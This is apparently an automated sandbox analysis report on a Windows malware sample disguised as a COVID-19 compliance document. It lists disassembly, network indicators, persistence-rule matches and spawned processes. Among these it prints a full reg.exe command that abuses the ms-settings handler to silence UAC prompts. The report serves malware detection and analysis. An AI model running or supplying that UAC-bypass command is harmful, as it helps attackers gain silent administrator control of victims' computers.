Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 14_3_023E0B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 14_3_023E0B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 14_3_023E0B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 20h | 14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 00000080h | 14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 10h | 14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 04h | 14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 02h | 14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 08h | 14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 01h | 14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-18h] | 14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-04h] | 14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea ecx, dword ptr [ebp-08h] | 14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-10h] | 14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 15_3_024102A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 15_3_024102A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 15_3_024102A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 15_3_024102A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-18h] | 15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-04h] | 15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea ecx, dword ptr [ebp-08h] | 15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-10h] | 15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 20h | 15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 00000080h | 15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 10h | 15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 04h | 15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 02h | 15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 08h | 15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 01h | 15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 15_3_0241A8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 15_3_0241A8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 15_3_0241A8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 15_3_0241A8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 20h | 15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 00000080h | 15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 10h | 15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 04h | 15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 02h | 15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 08h | 15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 01h | 15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-18h] | 15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-04h] | 15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea ecx, dword ptr [ebp-08h] | 15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-10h] | 15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-18h] | 15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-04h] | 15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-10h] | 15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 15_3_02400B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 15_3_02400B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 15_3_02400B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 15_3_02400B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, ebx | 15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], 00000000h | 15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then push 00000000h | 15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], 00000000h | 15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 15_3_02400B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 20h | 15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 00000080h | 15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 10h | 15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 04h | 15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 02h | 15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 08h | 15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then or edx, 01h | 15_3_0240040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-18h] | 15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-04h] | 15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h] | 15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea ecx, dword ptr [ebp-08h] | 15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-0Ch] | 15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea edx, dword ptr [ebp-1Ch] | 15_3_02400D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 4x nop then lea eax, dword ptr [ebp-10h] | 15_3_02400D28
Source: global traffic | TCP traffic: 192.168.2.4:49756 -> 216.38.7.225:7082
Source: Joe Sandbox View | IP Address: 162.159.130.233
Source: Joe Sandbox View | IP Address: 162.159.138.232
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 216.38.7.225
Source: unknown | DNS traffic detected: queries for: discord.com
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | String found in binary or memory: Http://gorohov.narod.ru
Source: Xbuhnek.exe | String found in binary or memory: https://discord.com/
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe, 00000000.00000003.669929024.00000000022D0000.00000004.00000001.sdmp, Xbuhnek.exe, 0000000E.00000003.794136357.00000000023E8000.00000004.00000001.sdmp, Xbuhnek.exe, 0000000F.00000003.811712369.00000000023FC000.00000004.00000001.sdmp | String found in binary or memory: https://discord.com/S
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 14_3_02358458
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 14_3_023F059D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Code function: 15_3_0241059D
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Static PE information: invalid certificate
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Xbuhnek.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
Source: 00000000.00000003.709710666.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.709710666.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.707937961.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.707937961.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710515160.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.710515160.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710590049.0000000002A44000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.710590049.0000000002A44000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710419486.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.710419486.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.709786166.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.709786166.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.708660813.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.708660813.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.707275364.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.707275364.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.706313231.0000000002A88000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.706313231.0000000002A88000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710144985.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.710144985.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.707371379.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.707371379.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.707195692.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000003.707195692.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000003.710335452.0000000002A74000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPED | Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPED | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: classification engine | Classification label: mal84.evad.winEXE@17/9@6/5
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 6_2_5048784E GetDiskFreeSpaceA, | 6_2_5048784E
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Xbuhzxs[1]
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Mutant created: \Sessions\1\BaseNamedObjects\winon-9DYKLX
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_01
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\notepad.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | Metadefender: Detection: 18%
Source: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe | File read: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe
Source: unknown | Process created: C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe 'C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe'
